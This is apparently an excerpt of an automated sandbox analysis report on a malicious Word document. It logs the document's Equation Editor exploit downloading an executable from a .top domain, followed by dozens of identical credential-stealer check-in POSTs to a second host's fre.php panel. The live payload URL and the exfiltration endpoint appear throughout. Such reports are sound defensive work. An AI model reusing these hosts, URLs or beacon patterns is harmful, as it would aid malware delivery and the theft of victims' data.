                  Source: global trafficHTTP traffic detected: GET /sharonzx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: universalmovies.topConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 176Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 176Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 149Connection: close
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeCode function: 21_2_00404ED4 recv,21_2_00404ED4
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D64B8BBB-F7FA-4868-BA26-522FB5F8B8BC}.tmpJump to behavior
                  Source: global trafficHTTP traffic detected: GET /sharonzx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: universalmovies.topConnection: Keep-Alive
                  Source: EQNEDT32.EXE, 00000002.00000002.348345473.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                  Source: global trafficDNS traffic detected: DNS query: universalmovies.top
                  Source: global trafficDNS traffic detected: DNS query: rocheholding.top
                  Source: unknownHTTP traffic detected: POST /evie3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: rocheholding.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 21507074Content-Length: 176Connection: close
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:17:35 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i6gJfvO7olfEsdyqt3RGG%2BL80oSkjC0dkl0pQDPrdA%2FOrqBRl824zYh%2FQlsYMOyTb1LhCVC2HJDcAJ7C3pkD4gvqSi%2B84qaGVYiCtS6gehR0uVH%2BdcmY70LhekTy3vlZxrwS"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 88870b2d4e8542c4-EWRalt-svc: h3=":443"; ma=86400Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:17:37 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7Cx05J3EhhX%2FOS64qMqLws5JP%2BEUh3VGZct31FDQXRJvKx7kiOFrgsQf0a6%2FqaxSC8WAc4IgNUS3w8YZXOcd5Bv0017KpFQTBpNxqRY67ZT3FQBncncDxNDgt26dNdVM4GsM"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 88870b3678c18cdd-EWRalt-svc: h3=":443"; ma=86400Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
